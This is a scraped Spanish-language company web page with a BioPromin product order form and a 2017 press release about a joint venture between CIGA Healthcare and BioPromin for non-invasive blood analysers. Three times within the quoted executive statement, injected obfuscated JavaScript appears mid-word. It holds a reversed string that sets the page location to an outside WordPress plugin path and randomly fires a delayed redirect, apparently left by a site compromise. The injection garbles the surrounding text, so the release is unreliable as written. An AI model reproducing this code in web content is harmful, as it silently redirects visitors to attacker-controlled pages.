ordenando
biopromin
Anesa
Elija el producto deseado, por favor:
Tipo de solicitud *
Producto *
Modelo
Próximo paso
biopromin
Anesa
Editar el paso anterior
Complete la información sobre usted y la compañía:
Nombre *
Móvil *
Pais *
Company
Dirección de la empresa
Detalle

BIOPROMIN LTD firma un acuerdo marco

Ballymena, Reino Unido, el 26 de junio de 2017, CIGA Healthcare (“CIGA”), un desarrollador, fabricante y proveedor de pruebas profesionales para tiendas al por menor, las farmacias y los clientes de los servicios de salud, anunció hoy la firma de un acuerdo marco de cooperación ( “Acuerdo”) con “BioPromin Ltd.” (“BioPromin”), la empresa especializada en la creación de analizadores de sangre no invasivos.

De conformidad con el Acuerdo celebrado entre la CIGA y “BioPromin” el 26 de junio de 2017, las partes acordaron establecer una empresa conjunta para el desarrollo, fabricación y venta de su propio analizador de sangre no invasivo en el Reino Unido. La formación de la empresa conjunta es en interés de ambas partes que firman el acuerdo final que es aprobado por los órganos de gobierno de las empresas y estipula las condiciones habituales de cancelación. “Estamos muy contentoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tos de unir fuerzas con “BioPromin”. La empresa conjunta consolida fuertes lazos en la industria farmacéutica de CIGA y la experiencia de muchos años de “BioPromin” en la fabricación y comercialización de tecnologías innovadores de análisis de sangre. La empresa conjunta nos da la oportunidad de utilizar el enorme potencial del mercado de equipos médicos del Reino Unido. Estamos esperando el momentoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to cuando podemos comenzar las entregas de analizadores de sangre clínicamente probados para el mercado del Reino Unido a través de la empresa conjunta,” – dijo Irwin Armstrong, presidente Atel y directoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor ejecutivo general de CIGA.

Sergey Kirakosyan, CMCO
Email: info@biopromin.com